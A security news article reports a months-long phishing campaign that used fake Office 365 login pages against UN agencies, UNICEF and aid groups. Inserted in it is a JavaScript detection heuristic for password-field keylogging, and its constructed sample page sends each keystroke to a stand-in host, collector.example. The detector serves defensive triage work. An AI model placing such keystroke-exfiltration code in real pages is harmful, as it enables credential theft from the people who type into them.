Help Net Security - Daily information security news with a focus on enterprise security.
Zeljka Zorz, Managing Editor, Help Net Security
October 25, 2019

Phishers have been targeting UN, UNICEF, Red Cross officials for months – and still do

Researchers have brought to light a longstanding phishing campaign aimed at the UN and its various networks, and a variety of humanitarian organizations, NGOs, universities and think tanks.

Some of these phishing pages are still up and are still not flagged as malicious by Google Safe Browsing, they warned.

The campaign is ongoing

The targeted organizations include the UN and its World Food Programme and Development Programme, UNICEF, the Heritage Foundation (an American conservative think tank), the International Federation of the Red Cross and Red Crescent Societies, the United States Institute of Peace (an independent, federal institution that provides analysis of and is involved in conflicts around the world), Concern Worldwide (Ireland’s largest aid and humanitarian agency), and many others.

The phishing pages are made to look like the organizations’ Office 365 login page for employees, as compromised Office 365 credentials provide attackers an entry point into organizations and enable them to launch stealthy insider attacks and collect sensitive information.

The phishing pages have key logging functionality embedded in the password field, so that everything entered into that field is sent to a C&C server, even if the potential victim fails to press the login button. Also, they are able to detect mobile visitors and present them with a mobile-friendly version.
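A page that behaves this way, with password-field keystrokes leaving the page before any form submit, can be triaged statically when a suspicious URL is reported. The following is an added example, not code from the article or from Lookout: a heuristic that flags pages where a keystroke event on a password input is paired with a network call. The sample pages and `collector.example` are constructed, and obfuscated or dynamically loaded scripts will evade it.

```javascript
// Added example: a static triage heuristic, not Lookout's detection logic.
const KEY_EVENTS = ['keyup', 'keydown', 'keypress', 'input'];
// Calls that can move data off the page without a form submit.
const SINKS = /\b(fetch|XMLHttpRequest|sendBeacon|WebSocket)\b|new\s+Image\s*\(/;

// Read one attribute from a raw tag string; null when the attribute is absent.
function attr(tag, name) {
  const m = tag.match(new RegExp(`\\s${name}\\s*=\\s*(?:"([^"]*)"|'([^']*)'|([^\\s>]+))`, 'i'));
  return m ? (m[1] ?? m[2] ?? m[3]) : null;
}

function findPasswordKeyCapture(html) {
  const findings = [];
  const scripts = [...html.matchAll(/<script\b[^>]*>([\s\S]*?)<\/script>/gi)].map((m) => m[1]);
  const pageHasSink = scripts.some((js) => SINKS.test(js));
  const fields = (html.match(/<input\b[^>]*>/gi) || [])
    .filter((t) => (attr(t, 'type') || '').toLowerCase() === 'password');

  for (const tag of fields) {
    const id = attr(tag, 'id');
    for (const ev of KEY_EVENTS) {
      // Case 1: inline handler (onkeyup="...") on the password field itself.
      const inline = attr(tag, 'on' + ev);
      if (inline !== null && (SINKS.test(inline) || pageHasSink)) {
        findings.push({ field: id, event: ev, via: 'inline' });
      }
      // Case 2: a script names the field, hooks the same event, and contains a sink.
      const hook = new RegExp(`addEventListener\\(\\s*['"]${ev}['"]|\\.on${ev}\\s*=`);
      if (id && scripts.some((js) => js.includes(id) && hook.test(js) && SINKS.test(js))) {
        findings.push({ field: id, event: ev, via: 'script' });
      }
    }
  }
  return findings;
}

// Constructed samples (not taken from the campaign): a page that ships each
// keystroke out, and a page with a local-only password strength meter.
const SAMPLE_SUSPECT = `<form><input type="password" id="pw1"></form>
<script>document.getElementById('pw1').addEventListener('keyup', function (e) {
  fetch('https://collector.example/k', { method: 'POST', body: e.target.value });
});</script>`;
const SAMPLE_BENIGN = `<form method="post"><input type="password" id="pw2"></form>
<script>document.getElementById('pw2').addEventListener('input', function (e) {
  document.getElementById('meter').value = Math.min(e.target.value.length, 12);
});</script>`;

console.log(findPasswordKeyCapture(SAMPLE_SUSPECT));
console.log(findPasswordKeyCapture(SAMPLE_BENIGN));
```

A hit is a reason to look closer, not a verdict: legitimate pages also send per-keystroke requests (for example, live validation), so findings should be reviewed together with the hosting domain and certificate details.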

“Mobile web browsers also unintentionally help obfuscate phishing URLs by truncating them, making it harder for the victims to discover the deception,” Lookout researcher Jeremy Richards has pointed out.

The researchers found that the infrastructure connected to these attacks has been live since March 2019 and the pages were/are hosted on two domains.

“SSL certificates used by the phishing infrastructure had two main ranges of validity: May 5, 2019 to August 3, 2019, and June 5, 2019 to September 3, 2019. Currently six certificates are still valid, and Lookout suspects that these attacks may still be ongoing,” Richards noted (though since the publication of their findings the sites with valid certificates have all become unavailable).

Kevin Bocek, VP security strategy & threat intelligence, Venafi, noted that phishers are taking advantage of the implicit trust users have in the green padlock created by TLS certificates.

“Internet users have been trained to look for a green padlock when they visit websites, and bad actors are using SSL/TLS certificates to impersonate all kinds of organizations. This may appear sophisticated, but these kinds of phishing attacks are very common. For example, in 2017, security researchers uncovered over 15,000 certificates containing the word ‘PayPal’ that were being used in attacks. And in June 2019, the FBI issued a warning stating that the green padlock on websites doesn’t mean the domain is trustworthy and safe from cyber criminals,” he added.

There’s no mention of who might be behind the attacks. State-sponsored hackers who are after sensitive information seem like the most likely culprits, though charities and humanitarian organizations are also often targeted by scammers who are after money, so who knows?
